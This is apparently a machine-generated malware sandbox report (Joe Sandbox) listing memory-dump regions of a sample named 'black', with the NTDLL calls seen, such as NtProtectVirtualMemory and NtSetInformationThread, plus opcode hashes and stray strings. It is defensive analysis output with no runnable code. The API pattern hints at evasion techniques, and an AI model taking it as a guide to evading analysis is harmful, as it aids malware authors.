                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 023AB805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  APIs
                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 023AB805
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: MemoryProtectVirtual
                                                  • String ID:
                                                  • API String ID: 2706961497-0
                                                  APIs
                                                  • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 023AC70F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileInformationQueryVolume
                                                  • String ID:
                                                  • API String ID: 634242254-0
                                                  APIs
                                                  • NtQueryVolumeInformationFile.NTDLL(?,?,?,?,?), ref: 023AC70F
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: FileInformationQueryVolume
                                                  • String ID:
                                                  • API String ID: 634242254-0
                                                  APIs
                                                  • NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 023AB4CF
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcessQuery
                                                  • String ID:
                                                  • API String ID: 1778838933-0
                                                  APIs
                                                  • NtSetInformationProcess.NTDLL(?,?,?,?), ref: 023D73B6
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationProcess
                                                  • String ID:
                                                  • API String ID: 1801817001-0
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 023AC45C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  APIs
                                                  • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 023AC45C
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationQuerySystem
                                                  • String ID:
                                                  • API String ID: 3562636166-0
                                                  • Opcode ID: ec5d28cc980b0b8bb0751da77694a023926276b922a0b61a107626c1ada7e763
                                                  • Instruction ID: 66d5dce31dd705f2748f48a31e10021eb8a9269083b4f857855e69fd562975cb
                                                  • Opcode Fuzzy Hash: ec5d28cc980b0b8bb0751da77694a023926276b922a0b61a107626c1ada7e763
                                                  • Instruction Fuzzy Hash: 213199B4D012589FCF10CFA9D984AEEFBB5FB49310F10942AE815B7214D735A945CF98
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 023AB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 5fca882ee576b07d1d00f045821291d1ecdf871756e88dd67e5d48f4b0db4884
                                                  • Instruction ID: 3050efc3a11ebd610d49a2b4c766f932fbc4a1af15ae65ab5231e2c426960047
                                                  • Opcode Fuzzy Hash: 5fca882ee576b07d1d00f045821291d1ecdf871756e88dd67e5d48f4b0db4884
                                                  • Instruction Fuzzy Hash: B93198B8D00258DFCF10CFA9D984ADEFBB1EB49314F20942AE815B7210D735A945CF98
                                                  APIs
                                                  • NtSetInformationThread.NTDLL(?,?,?,?), ref: 023AB5E7
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: InformationThread
                                                  • String ID:
                                                  • API String ID: 4046476035-0
                                                  • Opcode ID: 8ef52204866a5216a4bc259c9d6e9fe3d340272a61b409e8ac22d88ec572ab38
                                                  • Instruction ID: e0fff0236b4fe0ca0c43b96900c0aee8858cd95fae24874a11e162ba6a611150
                                                  • Opcode Fuzzy Hash: 8ef52204866a5216a4bc259c9d6e9fe3d340272a61b409e8ac22d88ec572ab38
                                                  • Instruction Fuzzy Hash: 033197B8D00258DFCF10CFA9D984A9EFBB1EB49314F20942AE815BB210D735A945CF58
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 431d1a8a31e1ec8b189fdee3255c25c78d9b858662243ab97626e53818379a90
                                                  • Instruction ID: 3a74fd2976d800bc2cad9ec13bf3ed7f4cde3b73d6c7b194c8b46358b572751e
                                                  • Opcode Fuzzy Hash: 431d1a8a31e1ec8b189fdee3255c25c78d9b858662243ab97626e53818379a90
                                                  • Instruction Fuzzy Hash: B331B8B8D002189FCB14CFA9D585AEEFBB5EF49314F20942AE819B7210C735A941CF98
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147263960.00000000023A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023A0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23a0000_black.jbxd
                                                  Similarity
                                                  • API ID: Close
                                                  • String ID:
                                                  • API String ID: 3535843008-0
                                                  • Opcode ID: 26a4382a971d206229f8aab58c6af53deec94fafd6b3a19ad1f66e6b5510db38
                                                  • Instruction ID: 6fd0073e4f1de5a6a07f09faa594043b6500cd4bf516a538d831438a474346e4
                                                  • Opcode Fuzzy Hash: 26a4382a971d206229f8aab58c6af53deec94fafd6b3a19ad1f66e6b5510db38
                                                  • Instruction Fuzzy Hash: 2931AAB4D012189FCB14CFAAD985AEEFBB5EF49324F10942AE815B7310C775A941CF98
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: I,yq
                                                  • API String ID: 0-804320314
                                                  • Opcode ID: c158f2eef0d5d0eb3985bba00d87656a4ad73986247cbab1e1c9b78c1e3a23d0
                                                  • Instruction ID: 2482d8da996dea8f942c342d185e237efc72765181af2e191801a5ae89739841
                                                  • Opcode Fuzzy Hash: c158f2eef0d5d0eb3985bba00d87656a4ad73986247cbab1e1c9b78c1e3a23d0
                                                  • Instruction Fuzzy Hash: 75D1C475E0022ACFCB58CFA9C8815AEBBB2FF49300F10892AD525EB354D7749A41CF50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3p3
                                                  • API String ID: 0-1548978683
                                                  • Opcode ID: 8912a132e352885d422bf4a987241fba4b037c8bf1aefb5ca602c5593c291e0c
                                                  • Instruction ID: f4505dec809564f57f89e6f2785eda977b96c7f636a885f522fa02b80dc860ba
                                                  • Opcode Fuzzy Hash: 8912a132e352885d422bf4a987241fba4b037c8bf1aefb5ca602c5593c291e0c
                                                  • Instruction Fuzzy Hash: 99A1C2B4E01219CFCB48DFA8D8849EEBBF2BF88310F14856AE425AB350D7759A45CF50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 3p3
                                                  • API String ID: 0-1548978683
                                                  • Opcode ID: 46eb85d89edbac9864714f63d99b66a07bc400d4cebeaa01ffc06eed53c0654b
                                                  • Instruction ID: ba88631f39f59cf447d2a5f740d6739a4d76d4d9e263c6c5c4523fd2e5d2b4b9
                                                  • Opcode Fuzzy Hash: 46eb85d89edbac9864714f63d99b66a07bc400d4cebeaa01ffc06eed53c0654b
                                                  • Instruction Fuzzy Hash: 48A192B4E00219CFDB48DFA9D8849EEBBF2BF88311F14852AE425AB350D7759A45CF50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1b878763c0a2c0b363527e6db31446c2fce843c16a4bd716f5f2fca680784d32
                                                  • Instruction ID: 6bf2b8333d02f1a8c4b27c5ee386bb11a2b2b26e76e5095d93eaf3096ada5d9c
                                                  • Opcode Fuzzy Hash: 1b878763c0a2c0b363527e6db31446c2fce843c16a4bd716f5f2fca680784d32
                                                  • Instruction Fuzzy Hash: CEF10A75E0021ACFCF54CFA9C8826AEBBB2FF98310F14816AD615A7354D7349A85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7cadc1499a9b2d27290e44da1ada50dedfae347ea4338e4d697e6dfcb203a43b
                                                  • Instruction ID: f7661c30d2e0fd9b8f0647943da7dae7b606d234ed3e1caf4a3ad34d59589454
                                                  • Opcode Fuzzy Hash: 7cadc1499a9b2d27290e44da1ada50dedfae347ea4338e4d697e6dfcb203a43b
                                                  • Instruction Fuzzy Hash: 70D1FD75E0020ACFCB44CFA9C8826AEBBB2FF98310F14816AD615E7354D7349A85CF91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 296234fba52db15464868e5e468227bdf9efe692014c14f28fe610a0158437d8
                                                  • Instruction ID: 45e255d81bae5e08cb3b531d624924de60605b937490899de702c0bbd917be5a
                                                  • Opcode Fuzzy Hash: 296234fba52db15464868e5e468227bdf9efe692014c14f28fe610a0158437d8
                                                  • Instruction Fuzzy Hash: 7F91F575E0020ACBDB14CFA9C4825EEFBB2FF94314F24851AD615AB254D734AA86CBD1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 02686dd6a575032de43436400aa0cf3a2bd0cf4e5b5abbe2112b5834209f9f2f
                                                  • Instruction ID: 6f7ffd5b08cdc7681c4a6acb8fe80e6b6299d70ed8f0e57ccfc4065e6b9e7f8a
                                                  • Opcode Fuzzy Hash: 02686dd6a575032de43436400aa0cf3a2bd0cf4e5b5abbe2112b5834209f9f2f
                                                  • Instruction Fuzzy Hash: 8F51E675E1122A9FCB44CFA9D8416EEBBF2BF48310F148A6AE425E7254D7749A01CF90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 91e0d806e17da30fc63f8e06ee2cae516ca419f88419017fb72adf2142cc2498
                                                  • Instruction ID: 066167a413ea5543b9552e772d93fce0520ecdeaa48e645f0a6f76e275889b06
                                                  • Opcode Fuzzy Hash: 91e0d806e17da30fc63f8e06ee2cae516ca419f88419017fb72adf2142cc2498
                                                  • Instruction Fuzzy Hash: B9412AB1E0124ACFDF14CFA9C4865EEBBB6AF94310F24802AD615A7254D7345A86CB92
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d8b08b39f7951c8b702bda01248f76a755480293250d54224246ec47ffc9f53f
                                                  • Instruction ID: 5a34b9aca5d45c9c94e19a2d2f4e522020fb5bddf91ad1398d114a3989199eb7
                                                  • Opcode Fuzzy Hash: d8b08b39f7951c8b702bda01248f76a755480293250d54224246ec47ffc9f53f
                                                  • Instruction Fuzzy Hash: EF510275E0022A8FCB44CFA9C8459EEF7B1FF88314F148A6AD521B7250D7749A15CF90
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 18b786cdbcc28559d7661b89290fcf5d44213befbbae5ed5ef0cfb62defda066
                                                  • Instruction ID: be37f17f3720b319ebc33a3cd64c3cffac7edf2295af1c01c64da4728417bf03
                                                  • Opcode Fuzzy Hash: 18b786cdbcc28559d7661b89290fcf5d44213befbbae5ed5ef0cfb62defda066
                                                  • Instruction Fuzzy Hash: 5F4182B5E1021A8FCB44CFA9C8455EEF7F2FB88210F048A6AD425B7354D7749A51CF91
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 00a417d6b6c18a0e1f34698f76c3847bce15589ca1ffecee9efe8228e22475d3
                                                  • Instruction ID: a2c7dfae395ba99fa4b9bf5ee221334562e05b2d8dcf647e141076aca7aadea5
                                                  • Opcode Fuzzy Hash: 00a417d6b6c18a0e1f34698f76c3847bce15589ca1ffecee9efe8228e22475d3
                                                  • Instruction Fuzzy Hash: C221BF79D04218DFDB00CFA9D88499DFBF1BB49310F10A16AE815B7360D7349901CF58
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1506fbfa7af1c423cf7d60fe2b2f8cdb894b5a82d5640aed5a0fa8363fb92d5b
                                                  • Instruction ID: aee78220900430ad161693530f48cd6f8523da9aba0186a1294a94da2647b3cf
                                                  • Opcode Fuzzy Hash: 1506fbfa7af1c423cf7d60fe2b2f8cdb894b5a82d5640aed5a0fa8363fb92d5b
                                                  • Instruction Fuzzy Hash: A3215DB9D04218DFDB14CFA9D8849ADFBF1BB49310F14A16AE815B7360D7349941CF58
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d527f1f218d38275c8b47376a71b4314234347fc1a401ac95de8779f263ce26f
                                                  • Instruction ID: 100133e1033171d3455781ec1cafc6d9c75331316f3bbe41ef44e0e5a2f41974
                                                  • Opcode Fuzzy Hash: d527f1f218d38275c8b47376a71b4314234347fc1a401ac95de8779f263ce26f
                                                  • Instruction Fuzzy Hash: 43112E70D0A6899FCB51CFA48850ABDBBF0BB06300F1485EAD054F7291C7345A45CB5A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1830705466ee8eebc41ac5de435ac9062dda15a91716bec08918ad9e2114e5d7
                                                  • Instruction ID: 4300ba02024c09470f0244315af1e0a09508fd77a95dad57c288f8ac5f6aa5b7
                                                  • Opcode Fuzzy Hash: 1830705466ee8eebc41ac5de435ac9062dda15a91716bec08918ad9e2114e5d7
                                                  • Instruction Fuzzy Hash: 41010478E44209DFCB40CFA8D980ABEBBF0BF09300F1054AAE425A3390D734AA40CF95
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 61d1c50522333d41add4ba3911b8f0117977125bba02efb388939f114311d92c
                                                  • Instruction ID: 51dea31188b0a8d320b6668a036f6a765ed2286f79b1df2ef8066e416137a2b0
                                                  • Opcode Fuzzy Hash: 61d1c50522333d41add4ba3911b8f0117977125bba02efb388939f114311d92c
                                                  • Instruction Fuzzy Hash: BA01E2B4E05249DFCB50DFA9D980ABEBBF4BB05300F5085AAD428B3380D7759A41CF5A
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: d80ce4c3f24c5a4794e6407593133b21e0e2760b2200fe648e24548204e2291d
                                                  • Instruction ID: 46766b9afc8442ecc9f0c33051048ee108fe09bf76c7613c5e000e76f0f609b4
                                                  • Opcode Fuzzy Hash: d80ce4c3f24c5a4794e6407593133b21e0e2760b2200fe648e24548204e2291d
                                                  • Instruction Fuzzy Hash: 8CE07574D05209AFCB54DFA9D844A9DFBF4AB46304F10A1AA9818B3250E7749A41DF49

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147473694.0000000002500000.00000040.00000800.00020000.00000000.sdmp, Offset: 02500000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_2500000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $^q$$^q$$^q$$^q
                                                  • API String ID: 0-2125118731
                                                  • Opcode ID: 74316d8ad76fae218aeceb448ab1446790448e0f2fe939e85351892189e21bed
                                                  • Instruction ID: f479567f1b2815b69daff191ce5df02de8c01deac78da96852d3347b2c43b6be
                                                  • Opcode Fuzzy Hash: 74316d8ad76fae218aeceb448ab1446790448e0f2fe939e85351892189e21bed
                                                  • Instruction Fuzzy Hash: 7421D831E4020CEFDB28DF98D984BADBBB5BB14300F108999E805AB3D4C771AB85DB55
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |bi$|bi
                                                  • API String ID: 0-1990502344
                                                  • Opcode ID: 8e3ee018e0d738ac34a73e10c6327d6d63bed9166e53b7b44377184fede3cc0f
                                                  • Instruction ID: ca4846d00282998c9306cf570dcd77e39873f27dbda5f1eb44d7f74a20299f3d
                                                  • Opcode Fuzzy Hash: 8e3ee018e0d738ac34a73e10c6327d6d63bed9166e53b7b44377184fede3cc0f
                                                  • Instruction Fuzzy Hash: CA21C574E01209DFCB48DFA9D5849ADBBF2FF98300F25859AE815AB760C730AE40DB50
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: b8fdf83c0d31c05259c181381ef27e51c7ef223ecc1f7a2ce215b5ee592c0a73
                                                  • Instruction ID: b9b86e4fd2bc792b197820dadcfdc73aa12446964d2442778237f2fde5eeb238
                                                  • Opcode Fuzzy Hash: b8fdf83c0d31c05259c181381ef27e51c7ef223ecc1f7a2ce215b5ee592c0a73
                                                  • Instruction Fuzzy Hash: B131CAB5D012589FDB10DFA9E584AEEFBF0EF49314F24906AE419B7210C734AA45CF58
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4147365112.00000000023D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 023D0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_23d0000_black.jbxd
                                                  Similarity
                                                  • API ID: EnumWindows
                                                  • String ID:
                                                  • API String ID: 1129996299-0
                                                  • Opcode ID: f98dbc1bbce5540baf9579eda40ae7cf1b15c01561e0a2007d008653c4c6fb2e
                                                  • Instruction ID: f05edc23238925bb1699c87c4dee2f3aa100c2b983b546b0b0e17cf8dd20b7ec
                                                  • Opcode Fuzzy Hash: f98dbc1bbce5540baf9579eda40ae7cf1b15c01561e0a2007d008653c4c6fb2e
                                                  • Instruction Fuzzy Hash: 6731B8B5D012189FCB14CFA9E984AEEFBF0AF49314F20902AE418B7250C774AA45CF58
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ,N"
                                                  • API String ID: 0-1483149224
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hbq
                                                  • API String ID: 0-1245868
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: |bi
                                                  • API String ID: 0-3239024895
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: -K9]
                                                  • API String ID: 0-344812077
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Hbq
                                                  • API String ID: 0-1245868
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: XUi
                                                  • API String ID: 0-1850529527
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_cd0000_black.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.4146989480.0000000000CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
